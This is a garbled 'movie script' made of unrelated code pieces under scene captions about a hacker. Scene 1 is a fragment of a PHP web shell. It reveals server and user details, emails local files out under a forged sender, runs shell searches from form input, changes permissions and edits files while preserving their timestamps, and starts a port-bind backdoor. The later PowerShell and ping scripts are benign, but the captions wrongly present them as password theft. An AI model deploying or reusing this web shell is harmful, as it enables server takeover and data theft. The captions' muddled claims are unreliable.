Movie script &&

Scene 1 - Exploit scenario with incomplete code; the author is himself an unknown hacker.
  2.  
  3.  
  4.  
  5. {
  6. $euserinfo = @posix_getpwuid(@posix_geteuid());
  7. $egroupinfo = @posix_getgrgid(@posix_getegid());
  8. echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
  9. }
  10. else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
  11. echo ws(3).$dir;
  12. echo ws(3).'( '.perms(@fileperms($dir)).' )';
  13. echo "<br>";
  14. echo ws(3)."<b>Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
  15. echo "</b></font>";
  16. }
  17. else
  18. {
  19. echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'<br>ip :'.ws(1).'</b></font><br>';
  20. echo "</td><td>";
  21. echo "<font face=tahoma size=-2 color=red><b>";
  22. echo ws(3).@substr(@php_uname(),0,120)."<br>";
  23. echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
  24. echo ws(3).@getenv("USERNAME")."<br>";
  25. echo ws(3).$dir;
  26. echo "<br>";
  27. echo ws(3)."<b>Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
  28. echo "<br></font>";
  29. }
  30. echo "</font>";
  31. echo "</td></tr></table>";
  32. if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
  33. {
  34. $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
  35. err(6+$res);
  36. $_POST['cmd']="";
  37. }
  38. if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
  39. {
  40. if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
  41. else
  42. {
  43. $filename = @basename($_POST['loc_file']);
  44. $filedump = @fread($file,@filesize($_POST['loc_file']));
  45. fclose($file);
  46. $content_encoding=$mime_type='';
  47. compress($filename,$filedump,$_POST['compress']);
  48. $attach = array(
  49. "name"=>$filename,
  50. "type"=>$mime_type,
  51. "content"=>$filedump
  52. );
  53. if(empty($_POST['subj'])) { $_POST['subj'] = 'file from Anonymous user'; }
  54. if(empty($_POST['from'])) { $_POST['from'] = 'hardcore@microsoft.com'; }
  55. $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
  56. err(6+$res);
  57. $_POST['cmd']="";
  58. }
  59. }
  60. if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
  61. {
  62. $_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
  63. }
  64. if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
  65. {
  66. switch($_POST['what'])
  67. {
  68. case 'own':
  69. @chown($_POST['param1'],$_POST['param2']);
  70. break;
  71. case 'grp':
  72. @chgrp($_POST['param1'],$_POST['param2']);
  73. break;
  74. case 'mod':
  75. @chmod($_POST['param1'],intval($_POST['param2'], 8));
  76. break;
  77. }
  78. $_POST['cmd']="";
  79. }
  80. if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
  81. {
  82. switch($_POST['what'])
  83. {
  84. case 'file':
  85. if($_POST['action'] == "create")
  86. {
  87. if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
  88. else {
  89. fclose($file);
  90. $_POST['e_name'] = $_POST['mk_name'];
  91. $_POST['cmd']="edit_file";
  92. echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
  93. }
  94. }
  95. else if($_POST['action'] == "delete")
  96. {
  97. if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
  98. $_POST['cmd']="";
  99. }
  100. break;
  101. case 'dir':
  102. if($_POST['action'] == "create"){
  103. if(mkdir($_POST['mk_name']))
  104. {
  105. $_POST['cmd']="";
  106. echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
  107. }
  108. else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
  109. }
  110. else if($_POST['action'] == "delete"){
  111. if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
  112. $_POST['cmd']="";
  113. }
  114. break;
  115. }
  116. }
  117. if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
  118. {
  119. if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
  120. if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
  121. else {
  122. echo $table_up3;
  123. echo $font;
  124. echo "<form name=save_file method=post>";
  125. echo ws(3)."<b>".$_POST['e_name']."</b>";
  126. echo "<div align=center><textarea name=e_text cols=121 rows=24>";
  127. echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
  128. fclose($file);
  129. echo "</textarea>";
  130. echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
  131. echo "<input type=hidden name=dir value=".$dir.">";
  132. echo "<input type=hidden name=cmd value=save_file>";
  133. echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
  134. echo "</div>";
  135. echo "</font>";
  136. echo "</form>";
  137. echo "</td></tr></table>";
  138. exit();
  139. }
  140. }
  141. if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
  142. {
  143. $mtime = @filemtime($_POST['e_name']);
  144. if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
  145. else {
  146. if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
  147. @fwrite($file,$_POST['e_text']);
  148. @touch($_POST['e_name'],$mtime,$mtime);
  149. $_POST['cmd']="";
  150. echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
  151. }
  152. }
  153.  
  154.  
  155.  
  156. if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
  157.  
  158.  
  159.  
Scene 2 - The hacker has access to everything once the 'server is pwned' - in other words, the database, the list of contacts, clients and personal information. There are many techniques to leverage access, and the most common are SQL attacks, but skilled hackers will look for backdoors and run attacks with APTs and RATs. The first step of an exploit is usually an email to hook the target with a crafted message and hyperlink that he would open because the 'spam filter' didn't work and he feels it's okay ()
  161.  
Scene 3 - Script to identify active accounts in the target's directory or vulnerable computers in order to steal passwords and login information. The hacker won't need to change the IP address every 30 secs, but he can do so to further exploit the network under his control. Although 30 secs is only possible for DDoS attacks. ()
  163.  
  164.  
[CmdletBinding()]
param(

# Name format to translate into. Each value is a key of $OutputNameTypes
# (begin block), which maps it to the NameTranslate format code.
[parameter(Mandatory=$TRUE,Position=0)]
[validateset("NT4","1779","SPN","canonical","GUID","DN","UPN","display","domainSimple","enterpriseSimple","canonicalEx")]
[String] $OutputType,

# One or more names to translate; may also come from the pipeline.
[parameter(Mandatory=$TRUE,Position=1,ValueFromPipeline=$TRUE)]
[String[]] $Name,

# Format of the input names. Same keys as -OutputType plus two input-only
# codes ("unknown" = 8, "SIDorSidHistory" = 12) defined in the begin block.
[validateset("NT4","1779","SPN","canonical","GUID","DN","UPN","display","domainSimple","enterpriseSimple","canonicalEx","SIDorSidHistory","unknown")]
[String] $InputType="unknown",

# Kind of directory service to bind to; mapped through $InitNameTypes and
# passed as the first argument of Init / InitEx.
[validateset("domain","server","GC")]
[String] $InitType="GC",

# Passed unchanged as the second argument of Init / InitEx.
[String] $InitName="",

# When set, the object's ChaseReferral property is set to 0x60 (begin block).
[Switch] $ChaseReferrals,

# Optional alternate credentials. When given, InitEx is used with the
# credential's user name, domain and (clear-text) password instead of Init.
[System.Management.Automation.PSCredential] $Credential
)
  187.  
  188. begin {
  189.  
  190. # Hash table to simplify output type names and values
  191. $OutputNameTypes = @{
  192. "1779" = 1;
  193. "DN" = 1;
  194. "canonical" = 2;
  195. "NT4" = 3;
  196. "display" = 4;
  197. "domainSimple" = 5;
  198. "enterpriseSimple" = 6;
  199. "GUID" = 7;
  200. "UPN" = 9;
  201. "canonicalEx" = 10;
  202. "SPN" = 11;
  203. }
  204.  
  205. # Copy output type hash table and add two additional types
  206. $InputNameTypes = $OutputNameTypes.Clone()
  207. $InputNameTypes.Add("unknown", 8)
  208. $InputNameTypes.Add("SIDorSidHistory", 12)
  209.  
  210. # Same as with previous hash tables...
  211. $InitNameTypes = @{
  212. "domain" = 1;
  213. "server" = 2;
  214. "GC" = 3;
  215. }
  216.  
  217. # Accessor functions to simplify calls to NameTranslate
  218. function invoke-method([__ComObject] $object, [String] $method, $parameters) {
  219. $output = $object.GetType().InvokeMember($method, "InvokeMethod", $NULL, $object, $parameters)
  220. if ( $output ) { $output }
  221. }
  222. function get-property([__ComObject] $object, [String] $property) {
  223. $object.GetType().InvokeMember($property, "GetProperty", $NULL, $object, $NULL)
  224. }
  225. function set-property([__ComObject] $object, [String] $property, $parameters) {
  226. [Void] $object.GetType().InvokeMember($property, "SetProperty", $NULL, $object, $parameters)
  227. }
  228.  
  229. # Create the NameTranslate COM object
  230. $NameTranslate = new-object -comobject NameTranslate
  231.  
  232. # If -Credential, use InitEx to initialize it; otherwise, use Init
  233. if ( $Credential ) {
  234. $networkCredential = $Credential.GetNetworkCredential()
  235. try {
  236. invoke-method $NameTranslate "InitEx" (
  237. $InitNameTypes[$InitType],
  238. $InitName,
  239. $networkCredential.UserName,
  240. $networkCredential.Domain,
  241. $networkCredential.Password
  242. )
  243. }
  244. catch [System.Management.Automation.MethodInvocationException] {
  245. write-error $_
  246. exit
  247. }
  248. finally {
  249. remove-variable networkCredential
  250. }
  251. }
  252. else {
  253. try {
  254. invoke-method $NameTranslate "Init" (
  255. $InitNameTypes[$InitType],
  256. $InitName
  257. )
  258. }
  259. catch [System.Management.Automation.MethodInvocationException] {
  260. write-error $_
  261. exit
  262. }
  263. }
  264.  
  265. # If -ChaseReferrals, set the object's ChaseReferral property to 0x60
  266. if ( $ChaseReferrals ) {
  267. set-property $NameTranslate "ChaseReferral" (0x60)
  268. }
  269.  
  270. # The NameTranslate object's Set method specifies the name to translate and
  271. # its input format, and the Get method returns the name in the output format
  272. function translate-adname2([String] $name, [Int] $inputType, [Int] $outputType) {
  273. try {
  274. invoke-method $NameTranslate "Set" ($inputType, $name)
  275. invoke-method $NameTranslate "Get" ($outputType)
  276. }
  277. catch [System.Management.Automation.MethodInvocationException] {
  278. write-error "'$name' - $($_.Exception.InnerException.Message)"
  279. }
  280. }
  281. }
  282.  
  283. process {
  284. Foreach($item in $name){
  285. translate-adname2 $name $InputNameTypes[$InputType] $OutputNameTypes[$OutputType]
  286. }
  287. }
  288. }
  289.  
Scene 4 - The hacker is caught once he decides to install this new 'software' from the hacked database. It's okay doing it, but he didn't disable automatic updates; trying to stop it immediately is not enough, he is connected to the Internet and an inevitable error message was delivered to the IT guy at the email admin@autoupdate-db.com
  291.  
He screwed it up! This is what he can see on his desktop before panicking ()
  293.  
  294.  
  295.  
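#=== PARAMETERS change them here
# add ip / hostname separated by white space
HOSTS="www.autoupdate-db.com"
# number of ping requests sent to each host
COUNT=40
# email report when
#SUBJECT="Ping failed"
#EMAILID="admin@autoupdate-db.com"
#=== Local vars (do not change them)
# Cron-friendly: change to the script's own directory so plwatch.txt is
# written next to the script.  The path is quoted so a directory with
# spaces works, and the script stops if the cd fails instead of silently
# appending its log wherever cron happened to start it.
cd "$(dirname "$0")" || exit 1
# Current script filename
SCRIPTNAME=$(basename "$0")
# Current date and time
today=$(date '+%Y-%m-%d')
currtime=$(date '+%H:%M:%S')
#=== Help message
# "$*" joins all arguments into one string; any argument containing --help
# prints the usage text and exits.
if [[ "$*" =~ --help ]]; then
    echo "Usage: bash $SCRIPTNAME
Check the rate of packets loss and output the result in a file named plwatch.txt in the same directory as this script.
Note: this script is cron-friendly, so you can add it to a cron job to regularly check your packets loss.
"
    exit
fi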
  320. #=== Main script
  321. for myHost in $HOSTS
  322. do
  323. msg=$(ping -c $COUNT $myHost | grep 'loss')
  324. echo "[$today $currtime] ($myHost $COUNT) $msg" >> plwatch.txt
  325. #count=$(ping -c $COUNT $myHost | grep 'received' | awk -F',' '{ print $2 }' | awk '{ print $1 }')
  326. #if [ $count -eq 0 ]; then
  327. # 100% failed
  328. # echo "Host : $myHost is down (ping failed) at $(date)" | mail -s "$SUBJECT" $EMAILID
  329. #fi
  330.  
  331. Scene 4 - This is what he can see in another window ()
  332.  
  333.  
  334. - - - 8< - - -
  335.  
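#address=192.168.1.99 # forced bad address
address=83.170.69.51 # www.autoupdate-db.com
internet=1 # default to internet is up

# Scratch file for the ping output.  The original wrote to the literal,
# predictable path "/tmp/ping.$" (not "$$"): every run shared the same
# world-readable name, it was never removed, and a pre-placed file or
# symlink at that path would be followed.  mktemp gives a private,
# unpredictable file and the trap removes it when the loop is interrupted.
pingout=$(mktemp "${TMPDIR:-/tmp}/ping.XXXXXX") || exit 1
trap 'rm -f "$pingout"' EXIT

while true
do
    # %a Day of Week, textual
    # %b Month, textual, abbreviated
    # %d Day, numeric
    # %r Timestamp AM/PM
    echo -n "$(date +"%a, %b %d, %r") -- "
    # Test the command directly instead of inspecting $? afterwards.
    if ping -c 1 "${address}" > "$pingout"; then
        if [[ ${internet} -eq 0 ]]; then # edge trigger -- was down now up
            echo -n "$(say "Internet back up")" # OSX Text-To-Speech
        fi
        internet=1
    else
        if [[ ${internet} -eq 1 ]]; then # edge trigger -- was up now down
            echo -n "$(say "Internet down")" # OSX Text-to-Speech
            echo -n "Internet DOWN"
        else
            echo -n "... still down"
        fi
        internet=0
    fi
    # Second line of the ping output (the reply / error line).
    sed -n '2p' "$pingout"
    sleep 30 # 30 seconds between probes
done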
  367.  
  368. - - - 8< - - -